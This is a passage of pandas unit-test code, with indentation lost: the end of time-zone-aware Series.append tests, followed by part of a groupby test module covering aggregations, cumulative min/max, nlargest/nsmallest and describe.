assert ts_result.index.tz == rng1.tz
rng1 = date_range("1/1/2011 01:00", periods=1, freq="H", tz="UTC")
rng2 = date_range("1/1/2011 02:00", periods=1, freq="H", tz="UTC")
ser1 = Series([1], index=rng1)
ser2 = Series([2], index=rng2)
ts_result = ser1.append(ser2)
exp_index = DatetimeIndex(
["2011-01-01 01:00", "2011-01-01 02:00"], tz="UTC", freq="H"
)
exp = Series([1, 2], index=exp_index)
tm.assert_series_equal(ts_result, exp)
utc = rng1.tz
assert utc == ts_result.index.tz
# GH#7795
# different tz coerces to object dtype, not UTC
rng1 = date_range("1/1/2011 01:00", periods=1, freq="H", tz="US/Eastern")
rng2 = date_range("1/1/2011 02:00", periods=1, freq="H", tz="US/Central")
ser1 = Series([1], index=rng1)
ser2 = Series([2], index=rng2)
ts_result = ser1.append(ser2)
exp_index = Index(
[
Timestamp("1/1/2011 01:00", tz="US/Eastern"),
Timestamp("1/1/2011 02:00", tz="US/Central"),
]
)
exp = Series([1, 2], index=exp_index)
tm.assert_series_equal(ts_result, exp)
def test_series_append_aware_naive(self):
rng1 = date_range("1/1/2011 01:00", periods=1, freq="H")
rng2 = date_range("1/1/2011 02:00", periods=1, freq="H", tz="US/Eastern")
ser1 = Series(np.random.randn(len(rng1)), index=rng1)
ser2 = Series(np.random.randn(len(rng2)), index=rng2)
ts_result = ser1.append(ser2)
expected = ser1.index.astype(object).append(ser2.index.astype(object))
assert ts_result.index.equals(expected)
# mixed
rng1 = date_range("1/1/2011 01:00", periods=1, freq="H")
rng2 = range(100)
ser1 = Series(np.random.randn(len(rng1)), index=rng1)
ser2 = Series(np.random.randn(len(rng2)), index=rng2)
ts_result = ser1.append(ser2)
expected = ser1.index.astype(object).append(ser2.index)
assert ts_result.index.equals(expected)
def test_series_append_dst(self):
rng1 = date_range("1/1/2016 01:00", periods=3, freq="H", tz="US/Eastern")
rng2 = date_range("8/1/2016 01:00", periods=3, freq="H", tz="US/Eastern")
ser1 = Series([1, 2, 3], index=rng1)
ser2 = Series([10, 11, 12], index=rng2)
ts_result = ser1.append(ser2)
exp_index = DatetimeIndex(
[
"2016-01-01 01:00",
"2016-01-01 02:00",
"2016-01-01 03:00",
"2016-08-01 01:00",
"2016-08-01 02:00",
"2016-08-01 03:00",
],
tz="US/Eastern",
)
exp = Series([1, 2, 3, 10, 11, 12], index=exp_index)
tm.assert_series_equal(ts_result, exp)
assert ts_result.index.tz == rng1.tz
|
|
import builtins
from io import StringIO
import numpy as np
import pytest
from pandas.errors import UnsupportedFunctionCall
import pandas as pd
from pandas import DataFrame, Index, MultiIndex, Series, Timestamp, date_range, isna
import pandas._testing as tm
import pandas.core.nanops as nanops
from pandas.util import _test_decorators as td
@pytest.fixture(
params=[np.int32, np.int64, np.float32, np.float64],
ids=["np.int32", "np.int64", "np.float32", "np.float64"],
)
def numpy_dtypes_for_minmax(request):
"""
Fixture of numpy dtypes with min and max values used for testing
cummin and cummax
"""
dtype = request.param
min_val = (
np.iinfo(dtype).min if np.dtype(dtype).kind == "i" else np.finfo(dtype).min
)
max_val = (
np.iinfo(dtype).max if np.dtype(dtype).kind == "i" else np.finfo(dtype).max
)
return (dtype, min_val, max_val)
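# For example, with np.int32 the fixture yields
# (np.int32, -2147483648, 2147483647); for float dtypes the bounds come from
# np.finfo instead of np.iinfo.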
@pytest.mark.parametrize("agg_func", ["any", "all"])
@pytest.mark.parametrize("skipna", [True, False])
@pytest.mark.parametrize(
"vals",
[
["foo", "bar", "baz"],
["foo", "", ""],
["", "", ""],
[1, 2, 3],
[1, 0, 0],
[0, 0, 0],
[1.0, 2.0, 3.0],
[1.0, 0.0, 0.0],
[0.0, 0.0, 0.0],
[True, True, True],
[True, False, False],
[False, False, False],
[np.nan, np.nan, np.nan],
],
)
def test_groupby_bool_aggs(agg_func, skipna, vals):
df = DataFrame({"key": ["a"] * 3 + ["b"] * 3, "val": vals * 2})
# Figure out expectation using Python builtin
exp = getattr(builtins, agg_func)(vals)
# edge case for missing data with skipna and 'any'
if skipna and all(isna(vals)) and agg_func == "any":
exp = False
exp_df = DataFrame([exp] * 2, columns=["val"], index=Index(["a", "b"], name="key"))
result = getattr(df.groupby("key"), agg_func)(skipna=skipna)
tm.assert_frame_equal(result, exp_df)
def test_max_min_non_numeric():
# #2700
aa = DataFrame({"nn": [11, 11, 22, 22], "ii": [1, 2, 3, 4], "ss": 4 * ["mama"]})
result = aa.groupby("nn").max()
assert "ss" in result
result = aa.groupby("nn").max(numeric_only=False)
assert "ss" in result
result = aa.groupby("nn").min()
assert "ss" in result
result = aa.groupby("nn").min(numeric_only=False)
assert "ss" in result
def test_intercept_builtin_sum():
s = Series([1.0, 2.0, np.nan, 3.0])
grouped = s.groupby([0, 1, 2, 2])
result = grouped.agg(builtins.sum)
result2 = grouped.apply(builtins.sum)
expected = grouped.sum()
tm.assert_series_equal(result, expected)
tm.assert_series_equal(result2, expected)
# @pytest.mark.parametrize("f", [max, min, sum])
# def test_builtins_apply(f):
@pytest.mark.parametrize("f", [max, min, sum])
@pytest.mark.parametrize("keys", ["jim", ["jim", "joe"]]) # Single key # Multi-key
def test_builtins_apply(keys, f):
# see gh-8155
df = pd.DataFrame(np.random.randint(1, 50, (1000, 2)), columns=["jim", "joe"])
df["jolie"] = np.random.randn(1000)
fname = f.__name__
result = df.groupby(keys).apply(f)
ngroups = len(df.drop_duplicates(subset=keys))
assert_msg = f"invalid frame shape: {result.shape} (expected ({ngroups}, 3))"
assert result.shape == (ngroups, 3), assert_msg
tm.assert_frame_equal(
result, # numpy's equivalent function
df.groupby(keys).apply(getattr(np, fname)),
)
if f != sum:
expected = df.groupby(keys).agg(fname).reset_index()
expected.set_index(keys, inplace=True, drop=False)
tm.assert_frame_equal(result, expected, check_dtype=False)
tm.assert_series_equal(getattr(result, fname)(), getattr(df, fname)())
def test_arg_passthru():
# make sure that we are passing thru kwargs
# to our agg functions
# GH3668
# GH5724
df = pd.DataFrame(
{
"group": [1, 1, 2],
"int": [1, 2, 3],
"float": [4.0, 5.0, 6.0],
"string": list("abc"),
"category_string": pd.Series(list("abc")).astype("category"),
"category_int": [7, 8, 9],
"datetime": pd.date_range("20130101", periods=3),
"datetimetz": pd.date_range("20130101", periods=3, tz="US/Eastern"),
"timedelta": pd.timedelta_range("1 s", periods=3, freq="s"),
},
columns=[
"group",
"int",
"float",
"string",
"category_string",
"category_int",
"datetime",
"datetimetz",
"timedelta",
],
)
expected_columns_numeric = Index(["int", "float", "category_int"])
# mean / median
expected = pd.DataFrame(
{
"category_int": [7.5, 9],
"float": [4.5, 6.0],
"timedelta": [pd.Timedelta("1.5s"), pd.Timedelta("3s")],
"int": [1.5, 3],
"datetime": [
pd.Timestamp("2013-01-01 12:00:00"),
pd.Timestamp("2013-01-03 00:00:00"),
],
"datetimetz": [
pd.Timestamp("2013-01-01 12:00:00", tz="US/Eastern"),
pd.Timestamp("2013-01-03 00:00:00", tz="US/Eastern"),
],
},
index=Index([1, 2], name="group"),
columns=["int", "float", "category_int", "datetime", "datetimetz", "timedelta"],
)
for attr in ["mean", "median"]:
result = getattr(df.groupby("group"), attr)()
tm.assert_index_equal(result.columns, expected_columns_numeric)
result = getattr(df.groupby("group"), attr)(numeric_only=False)
tm.assert_frame_equal(result.reindex_like(expected), expected)
# TODO: min, max *should* handle
# categorical (ordered) dtype
expected_columns = Index(
[
"int",
"float",
"string",
"category_int",
"datetime",
"datetimetz",
"timedelta",
]
)
for attr in ["min", "max"]:
result = getattr(df.groupby("group"), attr)()
tm.assert_index_equal(result.columns, expected_columns)
result = getattr(df.groupby("group"), attr)(numeric_only=False)
tm.assert_index_equal(result.columns, expected_columns)
expected_columns = Index(
[
"int",
"float",
"string",
"category_string",
"category_int",
"datetime",
"datetimetz",
"timedelta",
]
)
for attr in ["first", "last"]:
result = getattr(df.groupby("group"), attr)()
tm.assert_index_equal(result.columns, expected_columns)
result = getattr(df.groupby("group"), attr)(numeric_only=False)
tm.assert_index_equal(result.columns, expected_columns)
expected_columns = Index(["int", "float", "string", "category_int", "timedelta"])
result = df.groupby("group").sum()
tm.assert_index_equal(result.columns, expected_columns_numeric)
result = df.groupby("group").sum(numeric_only=False)
tm.assert_index_equal(result.columns, expected_columns)
expected_columns = Index(["int", "float", "category_int"])
for attr in ["prod", "cumprod"]:
result = getattr(df.groupby("group"), attr)()
tm.assert_index_equal(result.columns, expected_columns_numeric)
result = getattr(df.groupby("group"), attr)(numeric_only=False)
tm.assert_index_equal(result.columns, expected_columns)
# like min, max, but don't include strings
expected_columns = Index(
["int", "float", "category_int", "datetime", "datetimetz", "timedelta"]
)
for attr in ["cummin", "cummax"]:
result = getattr(df.groupby("group"), attr)()
# GH 15561: numeric_only=False set by default like min/max
tm.assert_index_equal(result.columns, expected_columns)
result = getattr(df.groupby("group"), attr)(numeric_only=False)
tm.assert_index_equal(result.columns, expected_columns)
expected_columns = Index(["int", "float", "category_int", "timedelta"])
result = getattr(df.groupby("group"), "cumsum")()
tm.assert_index_equal(result.columns, expected_columns_numeric)
result = getattr(df.groupby("group"), "cumsum")(numeric_only=False)
tm.assert_index_equal(result.columns, expected_columns)
def test_non_cython_api():
# GH5610
# non-cython calls should not include the grouper
df = DataFrame(
[[1, 2, "foo"], [1, np.nan, "bar"], [3, np.nan, "baz"]], columns=["A", "B", "C"]
)
g = df.groupby("A")
gni = df.groupby("A", as_index=False)
# mad
expected = DataFrame([[0], [np.nan]], columns=["B"], index=[1, 3])
expected.index.name = "A"
result = g.mad()
tm.assert_frame_equal(result, expected)
expected = DataFrame([[1, 0.0], [3, np.nan]], columns=["A", "B"], index=[0, 1])
result = gni.mad()
tm.assert_frame_equal(result, expected)
# describe
expected_index = pd.Index([1, 3], name="A")
expected_col = pd.MultiIndex(
levels=[["B"], ["count", "mean", "std", "min", "25%", "50%", "75%", "max"]],
codes=[[0] * 8, list(range(8))],
)
expected = pd.DataFrame(
[
[1.0, 2.0, np.nan, 2.0, 2.0, 2.0, 2.0, 2.0],
[0.0, np.nan, np.nan, np.nan, np.nan, np.nan, np.nan, np.nan],
],
index=expected_index,
columns=expected_col,
)
result = g.describe()
tm.assert_frame_equal(result, expected)
expected = pd.concat(
[
df[df.A == 1].describe().unstack().to_frame().T,
df[df.A == 3].describe().unstack().to_frame().T,
]
)
expected.index = pd.Index([0, 1])
result = gni.describe()
tm.assert_frame_equal(result, expected)
# any
expected = DataFrame(
[[True, True], [False, True]], columns=["B", "C"], index=[1, 3]
)
expected.index.name = "A"
result = g.any()
tm.assert_frame_equal(result, expected)
# idxmax
expected = DataFrame([[0.0], [np.nan]], columns=["B"], index=[1, 3])
expected.index.name = "A"
result = g.idxmax()
tm.assert_frame_equal(result, expected)
def test_cython_api2():
# this takes the fast apply path
# cumsum (GH5614)
df = DataFrame([[1, 2, np.nan], [1, np.nan, 9], [3, 4, 9]], columns=["A", "B", "C"])
expected = DataFrame([[2, np.nan], [np.nan, 9], [4, 9]], columns=["B", "C"])
result = df.groupby("A").cumsum()
tm.assert_frame_equal(result, expected)
# GH 5755 - cumsum is a transformer and should ignore as_index
result = df.groupby("A", as_index=False).cumsum()
tm.assert_frame_equal(result, expected)
# GH 13994
result = df.groupby("A").cumsum(axis=1)
expected = df.cumsum(axis=1)
tm.assert_frame_equal(result, expected)
result = df.groupby("A").cumprod(axis=1)
expected = df.cumprod(axis=1)
tm.assert_frame_equal(result, expected)
def test_cython_median():
df = DataFrame(np.random.randn(1000))
df.values[::2] = np.nan
labels = np.random.randint(0, 50, size=1000).astype(float)
labels[::17] = np.nan
result = df.groupby(labels).median()
exp = df.groupby(labels).agg(nanops.nanmedian)
tm.assert_frame_equal(result, exp)
df = DataFrame(np.random.randn(1000, 5))
rs = df.groupby(labels).agg(np.median)
xp = df.groupby(labels).median()
tm.assert_frame_equal(rs, xp)
def test_median_empty_bins(observed):
df = pd.DataFrame(np.random.randint(0, 44, 500))
grps = range(0, 55, 5)
bins = pd.cut(df[0], grps)
result = df.groupby(bins, observed=observed).median()
expected = df.groupby(bins, observed=observed).agg(lambda x: x.median())
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"dtype", ["int8", "int16", "int32", "int64", "float32", "float64", "uint64"]
)
@pytest.mark.parametrize(
"method,data",
[
("first", {"df": [{"a": 1, "b": 1}, {"a": 2, "b": 3}]}),
("last", {"df": [{"a": 1, "b": 2}, {"a": 2, "b": 4}]}),
("min", {"df": [{"a": 1, "b": 1}, {"a": 2, "b": 3}]}),
("max", {"df": [{"a": 1, "b": 2}, {"a": 2, "b": 4}]}),
("nth", {"df": [{"a": 1, "b": 2}, {"a": 2, "b": 4}], "args": [1]}),
("count", {"df": [{"a": 1, "b": 2}, {"a": 2, "b": 2}], "out_type": "int64"}),
],
)
def test_groupby_non_arithmetic_agg_types(dtype, method, data):
# GH9311, GH6620
df = pd.DataFrame(
[{"a": 1, "b": 1}, {"a": 1, "b": 2}, {"a": 2, "b": 3}, {"a": 2, "b": 4}]
)
df["b"] = df.b.astype(dtype)
if "args" not in data:
data["args"] = []
if "out_type" in data:
out_type = data["out_type"]
else:
out_type = dtype
exp = data["df"]
df_out = pd.DataFrame(exp)
df_out["b"] = df_out.b.astype(out_type)
df_out.set_index("a", inplace=True)
grpd = df.groupby("a")
t = getattr(grpd, method)(*data["args"])
tm.assert_frame_equal(t, df_out)
@pytest.mark.parametrize(
"i",
[
(
Timestamp("2011-01-15 12:50:28.502376"),
Timestamp("2011-01-20 12:50:28.593448"),
),
(24650000000000001, 24650000000000002),
],
)
def test_groupby_non_arithmetic_agg_int_like_precision(i):
# see gh-6620, gh-9311
df = pd.DataFrame([{"a": 1, "b": i[0]}, {"a": 1, "b": i[1]}])
grp_exp = {
"first": {"expected": i[0]},
"last": {"expected": i[1]},
"min": {"expected": i[0]},
"max": {"expected": i[1]},
"nth": {"expected": i[1], "args": [1]},
"count": {"expected": 2},
}
for method, data in grp_exp.items():
if "args" not in data:
data["args"] = []
grouped = df.groupby("a")
res = getattr(grouped, method)(*data["args"])
assert res.iloc[0].b == data["expected"]
@pytest.mark.parametrize(
"func, values",
[
("idxmin", {"c_int": [0, 2], "c_float": [1, 3], "c_date": [1, 2]}),
("idxmax", {"c_int": [1, 3], "c_float": [0, 2], "c_date": [0, 3]}),
],
)
def test_idxmin_idxmax_returns_int_types(func, values):
# GH 25444
df = pd.DataFrame(
{
"name": ["A", "A", "B", "B"],
"c_int": [1, 2, 3, 4],
"c_float": [4.02, 3.03, 2.04, 1.05],
"c_date": ["2019", "2018", "2016", "2017"],
}
)
df["c_date"] = pd.to_datetime(df["c_date"])
result = getattr(df.groupby("name"), func)()
expected = pd.DataFrame(values, index=Index(["A", "B"], name="name"))
tm.assert_frame_equal(result, expected)
def test_fill_consistency():
# GH9221
# pass thru keyword arguments to the generated wrapper
# are set if the passed kw is None (only)
df = DataFrame(
index=pd.MultiIndex.from_product(
[["value1", "value2"], date_range("2014-01-01", "2014-01-06")]
),
columns=Index(["1", "2"], name="id"),
)
df["1"] = [
np.nan,
1,
np.nan,
np.nan,
11,
np.nan,
np.nan,
2,
np.nan,
np.nan,
22,
np.nan,
]
df["2"] = [
np.nan,
3,
np.nan,
np.nan,
33,
np.nan,
np.nan,
4,
np.nan,
np.nan,
44,
np.nan,
]
expected = df.groupby(level=0, axis=0).fillna(method="ffill")
result = df.T.groupby(level=0, axis=1).fillna(method="ffill").T
tm.assert_frame_equal(result, expected)
def test_groupby_cumprod():
# GH 4095
df = pd.DataFrame({"key": ["b"] * 10, "value": 2})
actual = df.groupby("key")["value"].cumprod()
expected = df.groupby("key")["value"].apply(lambda x: x.cumprod())
expected.name = "value"
tm.assert_series_equal(actual, expected)
df = pd.DataFrame({"key": ["b"] * 100, "value": 2})
actual = df.groupby("key")["value"].cumprod()
# if overflows, groupby product casts to float
# while numpy passes back invalid values
df["value"] = df["value"].astype(float)
expected = df.groupby("key")["value"].apply(lambda x: x.cumprod())
expected.name = "value"
tm.assert_series_equal(actual, expected)
def scipy_sem(*args, **kwargs):
from scipy.stats import sem
return sem(*args, ddof=1, **kwargs)
@pytest.mark.parametrize(
"op,targop",
[
("mean", np.mean),
("median", np.median),
("std", np.std),
("var", np.var),
("sum", np.sum),
("prod", np.prod),
("min", np.min),
("max", np.max),
("first", lambda x: x.iloc[0]),
("last", lambda x: x.iloc[-1]),
("count", np.size),
pytest.param("sem", scipy_sem, marks=td.skip_if_no_scipy),
],
)
def test_ops_general(op, targop):
df = DataFrame(np.random.randn(1000))
labels = np.random.randint(0, 50, size=1000).astype(float)
result = getattr(df.groupby(labels), op)().astype(float)
expected = df.groupby(labels).agg(targop)
tm.assert_frame_equal(result, expected)
def test_max_nan_bug():
raw = """,Date,app,File
-04-23,2013-04-23 00:00:00,,log080001.log
-05-06,2013-05-06 00:00:00,,log.log
-05-07,2013-05-07 00:00:00,OE,xlsx"""
df = pd.read_csv(StringIO(raw), parse_dates=[0])
gb = df.groupby("Date")
r = gb[["File"]].max()
e = gb["File"].max().to_frame()
tm.assert_frame_equal(r, e)
assert not r["File"].isna().any()
def test_nlargest():
a = Series([1, 3, 5, 7, 2, 9, 0, 4, 6, 10])
b = Series(list("a" * 5 + "b" * 5))
gb = a.groupby(b)
r = gb.nlargest(3)
e = Series(
[7, 5, 3, 10, 9, 6],
index=MultiIndex.from_arrays([list("aaabbb"), [3, 2, 1, 9, 5, 8]]),
)
tm.assert_series_equal(r, e)
a = Series([1, 1, 3, 2, 0, 3, 3, 2, 1, 0])
gb = a.groupby(b)
e = Series(
[3, 2, 1, 3, 3, 2],
index=MultiIndex.from_arrays([list("aaabbb"), [2, 3, 1, 6, 5, 7]]),
)
tm.assert_series_equal(gb.nlargest(3, keep="last"), e)
def test_nlargest_mi_grouper():
# see gh-21411
npr = np.random.RandomState(123456789)
dts = date_range("20180101", periods=10)
iterables = [dts, ["one", "two"]]
idx = MultiIndex.from_product(iterables, names=["first", "second"])
s = Series(npr.randn(20), index=idx)
result = s.groupby("first").nlargest(1)
exp_idx = MultiIndex.from_tuples(
[
(dts[0], dts[0], "one"),
(dts[1], dts[1], "one"),
(dts[2], dts[2], "one"),
(dts[3], dts[3], "two"),
(dts[4], dts[4], "one"),
(dts[5], dts[5], "one"),
(dts[6], dts[6], "one"),
(dts[7], dts[7], "one"),
(dts[8], dts[8], "two"),
(dts[9], dts[9], "one"),
],
names=["first", "first", "second"],
)
exp_values = [
2.2129019979039612,
1.8417114045748335,
0.858963679564603,
1.3759151378258088,
0.9430284594687134,
0.5296914208183142,
0.8318045593815487,
-0.8476703342910327,
0.3804446884133735,
-0.8028845810770998,
]
expected = Series(exp_values, index=exp_idx)
tm.assert_series_equal(result, expected, check_exact=False)
def test_nsmallest():
a = Series([1, 3, 5, 7, 2, 9, 0, 4, 6, 10])
b = Series(list("a" * 5 + "b" * 5))
gb = a.groupby(b)
r = gb.nsmallest(3)
e = Series(
[1, 2, 3, 0, 4, 6],
index=MultiIndex.from_arrays([list("aaabbb"), [0, 4, 1, 6, 7, 8]]),
)
tm.assert_series_equal(r, e)
a = Series([1, 1, 3, 2, 0, 3, 3, 2, 1, 0])
gb = a.groupby(b)
e = Series(
[0, 1, 1, 0, 1, 2],
index=MultiIndex.from_arrays([list("aaabbb"), [4, 1, 0, 9, 8, 7]]),
)
tm.assert_series_equal(gb.nsmallest(3, keep="last"), e)
@pytest.mark.parametrize("func", ["cumprod", "cumsum"])
def test_numpy_compat(func):
# see gh-12811
df = pd.DataFrame({"A": [1, 2, 1], "B": [1, 2, 3]})
g = df.groupby("A")
msg = "numpy operations are not valid with groupby"
with pytest.raises(UnsupportedFunctionCall, match=msg):
getattr(g, func)(1, 2, 3)
with pytest.raises(UnsupportedFunctionCall, match=msg):
getattr(g, func)(foo=1)
def test_cummin(numpy_dtypes_for_minmax):
dtype = numpy_dtypes_for_minmax[0]
min_val = numpy_dtypes_for_minmax[1]
# GH 15048
base_df = pd.DataFrame(
{"A": [1, 1, 1, 1, 2, 2, 2, 2], "B": [3, 4, 3, 2, 2, 3, 2, 1]}
)
expected_mins = [3, 3, 3, 2, 2, 2, 2, 1]
df = base_df.astype(dtype)
expected = pd.DataFrame({"B": expected_mins}).astype(dtype)
result = df.groupby("A").cummin()
tm.assert_frame_equal(result, expected)
result = df.groupby("A").B.apply(lambda x: x.cummin()).to_frame()
tm.assert_frame_equal(result, expected)
# Test w/ min value for dtype
df.loc[[2, 6], "B"] = min_val
expected.loc[[2, 3, 6, 7], "B"] = min_val
result = df.groupby("A").cummin()
tm.assert_frame_equal(result, expected)
expected = df.groupby("A").B.apply(lambda x: x.cummin()).to_frame()
tm.assert_frame_equal(result, expected)
# Test nan in some values
base_df.loc[[0, 2, 4, 6], "B"] = np.nan
expected = pd.DataFrame({"B": [np.nan, 4, np.nan, 2, np.nan, 3, np.nan, 1]})
result = base_df.groupby("A").cummin()
tm.assert_frame_equal(result, expected)
expected = base_df.groupby("A").B.apply(lambda x: x.cummin()).to_frame()
tm.assert_frame_equal(result, expected)
# GH 15561
df = pd.DataFrame(dict(a=[1], b=pd.to_datetime(["2001"])))
expected = pd.Series(pd.to_datetime("2001"), index=[0], name="b")
result = df.groupby("a")["b"].cummin()
tm.assert_series_equal(expected, result)
# GH 15635
df = pd.DataFrame(dict(a=[1, 2, 1], b=[1, 2, 2]))
result = df.groupby("a").b.cummin()
expected = pd.Series([1, 2, 1], name="b")
tm.assert_series_equal(result, expected)
def test_cummin_all_nan_column():
base_df = pd.DataFrame({"A": [1, 1, 1, 1, 2, 2, 2, 2], "B": [np.nan] * 8})
expected = pd.DataFrame({"B": [np.nan] * 8})
result = base_df.groupby("A").cummin()
tm.assert_frame_equal(expected, result)
result = base_df.groupby("A").B.apply(lambda x: x.cummin()).to_frame()
tm.assert_frame_equal(expected, result)
def test_cummax(numpy_dtypes_for_minmax):
dtype = numpy_dtypes_for_minmax[0]
max_val = numpy_dtypes_for_minmax[2]
# GH 15048
base_df = pd.DataFrame(
{"A": [1, 1, 1, 1, 2, 2, 2, 2], "B": [3, 4, 3, 2, 2, 3, 2, 1]}
)
expected_maxs = [3, 4, 4, 4, 2, 3, 3, 3]
df = base_df.astype(dtype)
expected = pd.DataFrame({"B": expected_maxs}).astype(dtype)
result = df.groupby("A").cummax()
tm.assert_frame_equal(result, expected)
result = df.groupby("A").B.apply(lambda x: x.cummax()).to_frame()
tm.assert_frame_equal(result, expected)
# Test w/ max value for dtype
df.loc[[2, 6], "B"] = max_val
expected.loc[[2, 3, 6, 7], "B"] = max_val
result = df.groupby("A").cummax()
tm.assert_frame_equal(result, expected)
expected = df.groupby("A").B.apply(lambda x: x.cummax()).to_frame()
tm.assert_frame_equal(result, expected)
# Test nan in some values
base_df.loc[[0, 2, 4, 6], "B"] = np.nan
expected = pd.DataFrame({"B": [np.nan, 4, np.nan, 4, np.nan, 3, np.nan, 3]})
result = base_df.groupby("A").cummax()
tm.assert_frame_equal(result, expected)
expected = base_df.groupby("A").B.apply(lambda x: x.cummax()).to_frame()
tm.assert_frame_equal(result, expected)
# GH 15561
df = pd.DataFrame(dict(a=[1], b=pd.to_datetime(["2001"])))
expected = pd.Series(pd.to_datetime("2001"), index=[0], name="b")
result = df.groupby("a")["b"].cummax()
tm.assert_series_equal(expected, result)
# GH 15635
df = pd.DataFrame(dict(a=[1, 2, 1], b=[2, 1, 1]))
result = df.groupby("a").b.cummax()
expected = pd.Series([2, 1, 2], name="b")
tm.assert_series_equal(result, expected)
def test_cummax_all_nan_column():
base_df = pd.DataFrame({"A": [1, 1, 1, 1, 2, 2, 2, 2], "B": [np.nan] * 8})
expected = pd.DataFrame({"B": [np.nan] * 8})
result = base_df.groupby("A").cummax()
tm.assert_frame_equal(expected, result)
result = base_df.groupby("A").B.apply(lambda x: x.cummax()).to_frame()
tm.assert_frame_equal(expected, result)
@pytest.mark.parametrize(
"in_vals, out_vals",
[
# Basics: strictly increasing (T), strictly decreasing (F),
# abs val increasing (F), non-strictly increasing (T)
([1, 2, 5, 3, 2, 0, 4, 5, -6, 1, 1], [True, False, False, True]),
# Test with inf vals
(
[1, 2.1, np.inf, 3, 2, np.inf, -np.inf, 5, 11, 1, -np.inf],
[True, False, True, False],
),
# Test with nan vals; should always be False
(
[1, 2, np.nan, 3, 2, np.nan, np.nan, 5, -np.inf, 1, np.nan],
[False, False, False, False],
),
],
)
def test_is_monotonic_increasing(in_vals, out_vals):
# GH 17015
source_dict = {
"A": ["1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11"],
"B": ["a", "a", "a", "b", "b", "b", "c", "c", "c", "d", "d"],
"C": in_vals,
}
df = pd.DataFrame(source_dict)
result = df.groupby("B").C.is_monotonic_increasing
index = Index(list("abcd"), name="B")
expected = pd.Series(index=index, data=out_vals, name="C")
tm.assert_series_equal(result, expected)
# Also check result equal to manually taking x.is_monotonic_increasing.
expected = df.groupby(["B"]).C.apply(lambda x: x.is_monotonic_increasing)
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize(
"in_vals, out_vals",
[
# Basics: strictly decreasing (T), strictly increasing (F),
# abs val decreasing (F), non-strictly increasing (T)
([10, 9, 7, 3, 4, 5, -3, 2, 0, 1, 1], [True, False, False, True]),
# Test with inf vals
(
[np.inf, 1, -np.inf, np.inf, 2, -3, -np.inf, 5, -3, -np.inf, -np.inf],
[True, True, False, True],
),
# Test with nan vals; should always be False
(
[1, 2, np.nan, 3, 2, np.nan, np.nan, 5, -np.inf, 1, np.nan],
[False, False, False, False],
),
],
)
def test_is_monotonic_decreasing(in_vals, out_vals):
# GH 17015
source_dict = {
"A": ["1", "2", "3", "4", "5", "6", "7", "8", "9", "10", "11"],
"B": ["a", "a", "a", "b", "b", "b", "c", "c", "c", "d", "d"],
"C": in_vals,
}
df = pd.DataFrame(source_dict)
result = df.groupby("B").C.is_monotonic_decreasing
index = Index(list("abcd"), name="B")
expected = pd.Series(index=index, data=out_vals, name="C")
tm.assert_series_equal(result, expected)
# describe
# --------------------------------
def test_apply_describe_bug(mframe):
grouped = mframe.groupby(level="first")
grouped.describe() # it works!
def test_series_describe_multikey():
ts = tm.makeTimeSeries()
grouped = ts.groupby([lambda x: x.year, lambda x: x.month])
result = grouped.describe()
tm.assert_series_equal(result["mean"], grouped.mean(), check_names=False)
tm.assert_series_equal(result["std"], grouped.std(), check_names=False)
tm.assert_series_equal(result["min"], grouped.min(), check_names=False)
def test_series_describe_single():
ts = tm.makeTimeSeries()
grouped = ts.groupby(lambda x: x.month)
result = grouped.apply(lambda x: x.describe())
expected = grouped.describe().stack()
tm.assert_series_equal(result, expected)
def test_series_index_name(df):
grouped = df.loc[:, ["C"]].groupby(df["A"])
result = grouped.agg(lambda x: x.mean())
assert result.index.name == "A"
def test_frame_describe_multikey(tsframe):
grouped = tsframe.groupby([lambda x: x.year, lambda x: x.month])
result = grouped.describe()
desc_groups = []
for col in tsframe:
group = grouped[col].describe()
# GH 17464 - Remove duplicate MultiIndex levels
group_col = pd.MultiIndex(
levels=[[col], group.columns],
codes=[[0] * len(group.columns), range(len(group.columns))],
)
group = pd.DataFrame(group.values, columns=group_col, index=group.index)
desc_groups.append(group)
expected = pd.concat(desc_groups, axis=1)
tm.assert_frame_equal(result, expected)
groupedT = tsframe.groupby({"A": 0, "B": 0, "C": 1, "D": 1}, axis=1)
result = groupedT.describe()
expected = tsframe.describe().T
expected.index = pd.MultiIndex(
levels=[[0, 1], expected.index],
codes=[[0, 0, 1, 1], range(len(expected.index))],
)
tm.assert_frame_equal(result, expected)
def test_frame_describe_tupleindex():
# GH 14848 - regression from 0.19.0 to 0.19.1
df1 = DataFrame(
{
"x": [1, 2, 3, 4, 5] * 3,
"y": [10, 20, 30, 40, 50] * 3,
"z": [100, 200, 300, 400, 500] * 3,
}
)
df1["k"] = [(0, 0, 1), (0, 1, 0), (1, 0, 0)] * 5
df2 = df1.rename(columns={"k": "key"})
msg = "Names should be list-like for a MultiIndex"
with pytest.raises(ValueError, match=msg):
df1.groupby("k").describe()
with pytest.raises(ValueError, match=msg):
df2.groupby("key").describe()
def test_frame_describe_unstacked_format():
# GH 4792
prices = {
pd.Timestamp("2011-01-06 10:59:05", tz=None): 24990,
pd.Timestamp("2011-01-06 12:43:33", tz=None): 25499,
pd.Timestamp("2011-01-06 12:54:09", tz=None): 25499,
}
volumes = {
pd.Timestamp("2011-01-06 10:59:05", tz=None): 1500000000,
pd.Timestamp("2011-01-06 12:43:33", tz=None): 5000000000,
pd.Timestamp("2011-01-06 12:54:09", tz=None): 100000000,
}
df = pd.DataFrame({"PRICE": prices, "VOLUME": volumes})
result = df.groupby("PRICE").VOLUME.describe()
data = [
df[df.PRICE == 24990].VOLUME.describe().values.tolist(),
df[df.PRICE == 25499].VOLUME.describe().values.tolist(),
]
expected = pd.DataFrame(
data,
index=pd.Index([24990, 25499], name="PRICE"),
columns=["count", "mean", "std", "min", "25%", "50%", "75%", "max"],
)
tm.assert_frame_equal(result, expected)
def test_groupby_mean_no_overflow():
# Regression test for (#22487)
df = pd.DataFrame(
{
"user": ["A", "A", "A", "A", "A"],
"connections": [4970, 4749, 4719, 4704, 18446744073699999744],
}
)
assert df.groupby("user")["connections"].mean()["A"] == 3689348814740003840
@pytest.mark.parametrize(
"values",
[
{
"a": [1, 1, 1, 2, 2, 2, 3, 3, 3],
"b": [1, pd.NA, 2, 1, pd.NA, 2, 1, pd.NA, 2],
},
{"a": [1, 1, 2, 2, 3, 3], "b": [1, 2, 1, 2, 1, 2]},
],
)
@pytest.mark.parametrize("function", ["mean", "median", "var"])
def test_apply_to_nullable_integer_returns_float(values, function):
# https://github.com/pandas-dev/pandas/issues/32219
output = 0.5 if function == "var" else 1.5
arr = np.array([output] * 3, dtype=float)
